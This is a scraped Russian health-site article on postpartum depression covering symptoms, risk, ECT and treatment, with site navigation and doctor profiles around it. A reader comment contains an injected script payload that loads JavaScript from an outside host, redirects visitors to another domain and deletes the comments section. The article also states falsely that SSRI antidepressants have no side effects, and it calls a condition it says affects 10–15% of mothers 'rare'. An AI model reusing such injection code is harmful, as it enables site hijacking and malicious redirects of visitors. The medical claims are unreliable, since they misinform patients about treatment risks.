Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Послеродовая депрессия: г...  >>  Послеродовая депрессия: грусть-тоска меня съедает
 
Обратная связь
 

Послеродовая депрессия: грусть-тоска меня съедает

Размер шрифта
28 сентября 2011 08:25
  • google_analytics: false
  • Нравится

В первые дни после родов бывает до слез жалко малыша, вырванного из теплой утробы в резкий, яркий, холодный мир. К концу первого месяца ребенок крепнет, а мама веселеет. Однако у некоторых женщин подавленное состояние переходит в послеродовую депрессию.

Екатерина Олейникова / Здоровье инфо

Послеродовая депрессия – редкое заболевание, которое угрожает жизни и требует немедленного лечения. Им страдают 10-15 % матерей.

Симптомы послеродовой депрессии:

  • Угнетенность, грусть
  • Беспричинный плач
  • Утрата интереса к жизни
  • Чувство вины, собственной никчемности
  • Усталость, слабость, отсутствие энергии
  • Проблемы со сном
  • Расстройство аппетита
  • Невозможность сконцентрироваться
  • Мысли о самоубийстве

Если у вас есть хотя бы один из этих признаков, тем более, если хотя бы однажды мелькнула мысль о самоубийстве, – немедленно к врачу! Такой требовательный тон не случаен. Страдаете не только вы, но и ваш малыш. Ведь женщина теряет интерес и к нему. По статистике, если мать переживает послеродовую депрессию, ее ребенок будет отставать в умственном и эмоциональном развитии.

Как предотвратить послеродовую депрессию?

Если женщина до и во время беременности страдала перепадами настроения, если в семье проблемы с мужем, если было отмечено биполярное расстройство, она – в группе риска. Именно такие эмоционально-нестабильные мамы незадолго до родов нуждаются в профилактических беседах с психотерапевтом.

Что происходит?

Пока точный механизм развития депрессии науке неизвестен, скорее всего – это происходит на гормональном уровне, когда уменьшается количество эстрогенов.


Что делать?

Редко кому в голову приходит обратиться за помощью к близким, а тем более пойти к врачу. Но чем раньше вы это сделаете, тем лучше. В запущенных случаях больную женщину могут отправить на электроконвульсивную терапию, или попросту на электрошок, который чреват всевозможными осложнениями, в том числе и расстройствами памяти.

Кстати, именно электрошоком лечили героя Джека Николсона в фильме «Полет над гнездом кукушки». Эта операция проводится до сих пор, но споры вокруг нее не стихают. Во время воздействия электрошока происходит стимуляция выработки дофамина и норадреналина. Однако некоторые ученые все равно считают эту операцию насилием над личностью.

Тех же, кто обратился к врачу с симптомами послеродовой депрессии вовремя, отправляют на обследование – проверяют работу всех органов тела, уделяя особое внимание щитовидной железе, и ищут признаки анемии.

Как лечить послеродовую депрессию?

Есть два способа: медикаментозный и немедикаментозный.

В первом случае назначаются так называемые селективные ингибиторы обратного захвата серотонина – антидепрессанты, которые отлично переносятся и не имеют побочных эффектов. Препараты увеличивают уровень серотонина в крови, а значит, повышают настроение.

Во втором случае послеродовая депрессия лечится с помощью психотерапии, которая помогает наладить отношения в семье. Этот метод прекрасно подходит кормящим мамам и тем, кто не желает принимать лекарства.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сладкие газировки вызывают депрессию   Ботокс – спасение от депрессии   Признаки депрессии у близкого человека   Причины депрессии, о которых вы не подозревали. Часть 1  
01 апреля 2013Сладкие газировки вызывают депрессию 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
22 ноября 2012Ботокс – спасение от депрессии 24 февраля 2012Мигрень повышает риск депрессии у женщин
 

Слайдшоу

1
Вся правда о депрессии
Что не дает вам уснуть
Что скрывает головная боль

Тесты

Что вы знаете о депрессии?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.